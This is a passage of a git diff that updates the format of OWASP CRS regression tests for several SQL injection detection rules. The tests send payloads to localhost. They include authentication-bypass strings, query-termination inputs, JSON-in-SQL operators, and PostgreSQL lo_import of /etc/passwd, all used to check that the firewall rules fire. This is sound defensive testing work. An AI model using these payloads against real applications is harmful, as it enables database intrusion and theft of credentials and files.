text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 22 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_import('/etc' || '/pass' || 'wd')::int::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 23 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1' and lo_get(16400)::text::bool and 'true" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-24 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1' and lo_get(16400)::text::bool and 'true" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 24 desc: "Detects odd number of quotes in request headers" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942521" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "1'and json_search (json_array(password),0b11000010110110001101100,'t_______________')#" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml index c692b1f97..f81b8e311 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942522.yaml @@ -2,162 +2,161 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942522.yaml +rule_id: 942522 tests: - - test_title: 942522-1 + - test_id: 1 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \'or'1 - data: "var=%5C'or'1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \'or'1 + data: "var=%5C'or'1" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 2 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \"or"1 - data: "var=%5C%22or%221" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \"or"1 + data: "var=%5C%22or%221" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 3 desc: "Blocks bypass with escaped quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # \`or`1 - data: "var=%5C%60or%601" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # \`or`1 + data: "var=%5C%60or%601" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 4 desc: "Blocks bypass with: \\'and" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C'and" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C'and" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 5 desc: "Negative test: doesn't block normal SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='or'1" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='or'1" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 6 desc: "Negative test: doesn't block escaped quotes without following (and|or)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%5C' foo or" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%5C' foo or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 7 desc: "New line bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=newline%0A%5C' and 1" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942522-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=newline%0A%5C' and 1" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 8 desc: "Negative test: Wikipedia article about SQLi" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" - version: HTTP/1.0 - output: - no_log_contains: id "942522" - - test_title: 942522-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=Incorrectly%20constructed%20SQL%20statements%0AThis%20form%20of%20injection%20relies%20on%20the%20fact%20that%20SQL%20statements%20consist%20of%20both%20data%20used%20by%20the%20SQL%20statement%20and%20commands%20that%20control%20how%20the%20SQL%20statement%20is%20executed.%20For%20example%2C%20in%20the%20SQL%20statement%20select%20*%20from%20person%20where%20name%20%3D%20'susan'%20and%20age%20%3D%202%20the%20string%20'susan'%20is%20data%20and%20the%20fragment%20and%20age%20%3D%202%20is%20an%20example%20of%20a%20command%20(the%20value%202%20is%20also%20data%20in%20this%20example).%0A%0ASQL%20injection%20occurs%20when%20specially%20crafted%20user%20input%20is%20processed%20by%20the%20receiving%20program%20in%20a%20way%20that%20allows%20the%20input%20to%20exit%20a%20data%20context%20and%20enter%20a%20command%20context.%20This%20allows%20the%20attacker%20to%20alter%20the%20structure%20of%20the%20SQL%20statement%20which%20is%20executed.%0A%0AAs%20a%20simple%20example%2C%20imagine%20that%20the%20data%20'susan'%20in%20the%20above%20statement%20was%20provided%20by%20user%20input.%20The%20user%20entered%20the%20string%20'susan'%20(without%20the%20apostrophes)%20in%20a%20web%20form%20text%20entry%20field%2C%20and%20the%20program%20used%20string%20concatenation%20statements%20to%20form%20the%20above%20SQL%20statement%20from%20the%20three%20fragments%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'susan'%2C%20and%20'%20and%20age%20%3D%202.%0A%0ANow%20imagine%20that%20instead%20of%20entering%20'susan'%20the%20attacker%20entered%20'%20or%201%3D1%3B%20--.%0A%0AThe%20program%20will%20use%20the%20same%20string%20concatenation%20approach%20with%20the%203%20fragments%20of%20select%20*%20from%20person%20where%20name%3D'%2C%20the%20user%20input%20of%20'%20or%201%3D1%3B%20--%2C%20and%20'%20and%20age%20%3D%202%20and%20construct%20the%20statement%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20--%20and%20age%20%3D%202.%20Many%20databases%20will%20ignore%20the%20text%20after%20the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 9 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942522" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml index eb9af879b..0fc688711 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml @@ -2,23 +2,22 @@ meta: author: "Franziska Bühler, azurit" description: "Detects SQL query termination" - enabled: true - name: 942530.yaml +rule_id: 942530 tests: - - test_title: 942530-1 + - test_id: 1 desc: "Detects SQL query termination with ';" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin@juice-sh.op';&password=foo" - version: HTTP/1.0 - output: - log_contains: id "942530" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin@juice-sh.op';&password=foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942530] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml index 97d543f83..ad78ed7d5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml @@ -2,135 +2,134 @@ meta: author: "karelorigin, Walter Hop, azurit" description: Various Authentication bypass tests - enabled: true - name: 942540.yaml +rule_id: 942540 tests: - - test_title: 942540-1 + - test_id: 1 desc: "Positive test for single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op';" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op';" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 2 desc: "Positive test for double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op\";" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op\";" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 3 desc: "Positive test for backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op`;" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op`;" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 4 desc: "False positive test CSV balanced single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='foo';'bar';'def'" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='foo';'bar';'def'" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942540] + - test_id: 5 desc: "False positive test balanced backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=`foo`;`bar`;`def`" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=`foo`;`bar`;`def`" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942540] + - test_id: 6 desc: "False positive test (markdown) mixed and balanced quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Content-Type: "multipart/form-data; boundary=--------397236876" - method: POST - port: 80 - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="document"; filename="document.md" - Content-Type: text/markdown + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "multipart/form-data; boundary=--------397236876" + method: POST + port: 80 + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="document"; filename="document.md" + Content-Type: text/markdown - # Foo - my name is 'foo'; and I work on CRS. - # Bar - my name is "bar"; and I work on CRS. - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: id "942540" - - test_title: 942540-7 + # Foo + my name is 'foo'; and I work on CRS. + # Bar + my name is "bar"; and I work on CRS. + ----------397236876-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [942540] + - test_id: 7 desc: "Test for bypass with comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" - version: HTTP/1.0 - output: - log_contains: id "942540" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml index f063ea0ed..f6691e602 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml @@ -2,672 +2,671 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: JSON in SQL bypass technique - enabled: true - name: 942550.yaml +rule_id: 942550 tests: - - test_title: 942550-1 + - test_id: 1 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 2 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 3 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 4 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: 